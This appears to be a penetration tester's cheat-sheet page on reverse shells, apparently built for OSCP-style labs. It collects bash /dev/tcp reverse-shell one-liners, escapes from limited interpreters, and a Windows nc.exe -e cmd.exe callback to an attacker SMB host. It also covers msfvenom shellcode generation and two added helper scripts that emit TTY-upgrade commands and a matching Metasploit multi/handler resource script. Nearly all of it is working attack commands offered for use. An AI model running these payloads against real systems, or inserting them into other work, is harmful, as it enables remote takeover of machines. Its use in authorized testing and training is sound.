Shells
Reverse shells
Links
https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
https://github.com/Tib3rius/rsg/blob/master/shells.txt
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/swisskyrepo/PayloadsAllTheThings
https://cyb3rdan.com/2019/07/01/oscp/
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Shells
/bin/bash -i >& /dev/tcp/10.10.14.20/4444 0>&1
bash -i >& /dev/tcp/192.168.32.31/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1'
/dev/tcp and the >& redirection are bash features, not POSIX sh: if the injection point executes under /bin/sh (dash on Debian/Ubuntu), the first two forms fail silently, so use the third form, which wraps the one-liner in bash -c. Catch the connection with a listener on the attacker side, e.g. nc -lvnp 4444.
Getting a shell in limited interpreters:
/bin/sh -i
/bin/bash -i
bash -c '<cmd>'    (-c runs the command string; bash's own `help` lists the shell builtins)
import os; os.system('/bin/bash')    (from an interactive Python prompt)
python -c 'import os; os.system("/bin/bash")'    (-c: program passed in as string, terminates option list)
system("start cmd.exe /k $cmd")    (Windows, from an interpreter that exposes system(); $cmd holds the command to run)
Second shell
After getting a shell, get a second one with "start" in case the first one hangs or crashes (assuming you are running an SMB server that hosts nc.exe):
victim > start \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80
Upgrade to full Shell
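Added example (not from the page; it follows the sequence described in the ropnop write-up linked above): a helper that prints the full TTY-upgrade sequence for a netcat shell, with the rows/cols for the final stty command taken from the attacker's own terminal via `stty size` when one is attached. The 50x200 fallback and the function names are illustrative; `python3` is assumed to exist on the target.

```shell
#!/bin/sh
# Added example: emit the commands for upgrading a dumb netcat shell to a
# full interactive TTY.

# Terminal size of the attacker's terminal as "rows cols"; 'stty size' reads
# stdin, so it fails when no terminal is attached and we fall back to $1 $2.
term_size() {
    if size=$(stty size 2>/dev/null) && [ -n "$size" ]; then
        echo "$size"
    else
        echo "${1:-50} ${2:-200}"
    fi
}

# $1 = rows, $2 = cols. Lines marked (victim) are typed into the reverse
# shell, lines marked (attacker) into the local terminal running nc.
tty_upgrade_cmds() {
    rows=$1; cols=$2
    cat <<EOF
# (victim) 1. spawn a pty so that job control, tab completion and Ctrl-C work
python3 -c 'import pty; pty.spawn("/bin/bash")'
# (victim) 2. press Ctrl-Z to background the shell
# (attacker) 3. stop the local terminal from echoing/interpreting keys, then resume nc
stty raw -echo; fg
# (victim) 4. fix the terminal state and tell the pty how big the screen is
reset
export SHELL=/bin/bash TERM=xterm-256color
stty rows $rows cols $cols
EOF
}

# Usage: rows/cols from the local terminal (or the fallback) are baked in.
tty_upgrade_cmds $(term_size 50 200)
```

Without the final `stty rows/cols`, programs such as vim and less will assume a tiny screen; the values must match the attacker's terminal, which is why they are read locally.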
Msfvenom
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/
https://netsec.ws/?p=331
-p = payload
-f = output format
-o = output file
-a = architecture
-e = encoder
-i = iterations of the encoder
-b = bad characters to avoid, e.g. \x00\xff
--platform = platform for the payload
--smallest = generate the smallest possible payload
Multi/Handler
Create small shellcode (-b "\x00" forces an encoder; -f python emits the bytes as a Python buf variable for an exploit script):
msfvenom -p windows/shell_reverse_tcp -a x86 -f python --platform windows LHOST=<ip> LPORT=443 -b "\x00" EXITFUNC=thread --smallest -e x86/fnstenv_mov
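Added example (not from the page): the msfvenom command above and the multi/handler resource script that catches it, generated from one set of variables so that the payload name, LHOST and LPORT cannot drift apart. This matters because the handler must use the exact same payload name (windows/shell_reverse_tcp is the stageless cmd shell; windows/shell/reverse_tcp is the staged one, and a mismatch means the connection comes in but no session is created). 10.10.14.20 and the function names are illustrative; the script only prints the commands, it does not run msfvenom or msfconsole.

```shell
#!/bin/sh
# Added example: keep msfvenom and exploit/multi/handler in sync.

PAYLOAD=windows/shell_reverse_tcp

# $1 = LHOST, $2 = LPORT. Same options as the page's command.
venom_cmd() {
    printf 'msfvenom -p %s -a x86 -f python --platform windows LHOST=%s LPORT=%s -b "\\x00" EXITFUNC=thread --smallest -e x86/fnstenv_mov\n' \
        "$PAYLOAD" "$1" "$2"
}

# msfconsole resource script for the matching listener. ExitOnSession false
# keeps the handler alive for more than one callback; -j -z runs it as a
# background job without dropping into the first session.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# Cross-check: payload named in the handler equals the one passed to msfvenom.
handler_matches_venom() {
    v=$(venom_cmd "$1" "$2" | sed -n 's/.*-p \([^ ]*\).*/\1/p')
    h=$(handler_rc "$1" "$2" | sed -n 's/^set payload //p')
    [ "$v" = "$h" ]
}

# Usage: print the command and write the resource script.
venom_cmd 10.10.14.20 443
handler_rc 10.10.14.20 443 > handler.rc
handler_matches_venom 10.10.14.20 443 && echo "handler.rc matches payload"
```

Start the listener with `msfconsole -q -r handler.rc` before the shellcode runs; with `-j -z` the handler keeps listening, and `sessions -i 1` attaches to the first shell.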